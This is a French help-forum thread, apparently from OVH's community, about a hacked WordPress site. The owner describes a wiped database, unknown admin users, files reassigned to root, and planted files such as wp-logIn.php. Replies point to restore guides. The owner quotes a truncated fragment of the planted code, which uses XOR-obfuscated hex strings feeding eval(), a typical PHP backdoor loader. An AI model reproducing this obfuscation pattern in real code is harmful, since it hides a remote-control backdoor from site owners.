Possible piratage de WP et impossible de restaurer
Bonjour à toutes et à tous,
Mon nom de domaine est : ooka.fr et j'ai 2 modules dessus.
1 Wordpress sous www.ooka.fr
1 Prestashop sous boutique.ooka.fr
Et j'utilise l'offre : hebergement cloud
Aujourdhui je me suis rendu compte que mon site vitrine renvoyé vers une page d'un post par defaut WP.
Panique… j'essaye de me connecter au wp-admin : forbidden
Je me connect a ma BDD avec PhpMyAdmin et la je vois qu'elle est presque vide, comme une ré-installe de WP. Et 2 users que je ne connais pas.
J'ai donc restaurer la BDD avec succès.
Je suis ensuite aller me connecter sur mon FTP et la je me suis rendu compte que le repertoire www n'appartenait plus à mon user FTP (comme le repertoire prestashop) mais à root avec des droits rw-r–r–
Impossible de modifier quoique ce soit. Et j'ai des fichiers qui sont apparue : wp-logIn.php, wp-ver.php,wp-include.php,wp-corn-sample.php, wp-comment.php
Ils contiennent tous de drole de code :
" $TYQTAYNY = "\x2d\x3d\x3d\x2a\x29\x36\x26\x39\x26\x2b\x3a\x26"^'JGHDJYKITNIU';
$GSTEGFNO = "\x38\x30\x3c\x3d\x7b\x7d\x9\x28\x27\x20\x27\x21\x3f"^'ZQOXMIVLBCHEZ';
eval($TYQTA=…"
Aucune des srestauration par le manager OVH n'ont pas l'air de marcher : elles apparaissent dans "tache en cours" avec le statut "planifier" puis disparaissent sans informations.
Sur mon client FTP on voit qu'aucun fichier n'a bougé.
Je peux me balader dans mes sauvegardes en FTP mais ca ne sert a rien car je ne peux rien sur le dossier www et ses sous dossiers/fichiers vu que tout est en root.
J'ai ouvert un ticket chez OVH pour qu'il redonne les droits à mon user FTP mais je ne vois pas quoi faire d'autre, je suis un peu bloqué la.
Mon dosser prestashop n'a pas bougé. fort heureusement.
Mon dosser prestashop n'a pas bougé. fort heureusement.
Bonjour @CafesD
https://boutique.ooka.fr --> Error 503 Backend fetch failed.
Depuis quelle date votre site https://ooka.fr/ a été piraté ?
N'auriez-vous pas intérêt à faire une restauration **Hébergement** + **Base de données** à une date antérieure à votre problème ?
Voir dans mon guide le paragraphe :
**T - Restauration OVH de votre site à une date antérieure**
https://www.wordetweb.com/word-et-web/WORDPRESS-guide-installation-de-WordPress-premier-domaine-chez-OVH-FR.htm#_T_%E2%80%93_Restauration
Ils contiennent tous de drole de code :
Bonjour,
Voyez aussi cette recette officielle de Wordpress pour superposer une installation faîche:
https://wordpress.org/documentation/article/upgrading-wordpress-extended-instructions/
Je vous remercie pour les documentations envoyées mais je les connaissais déja. Le problème c'est que je ne peux rien faire à cause des droits sur les fichiers/dossier en rw-r–r-- appartenant à root.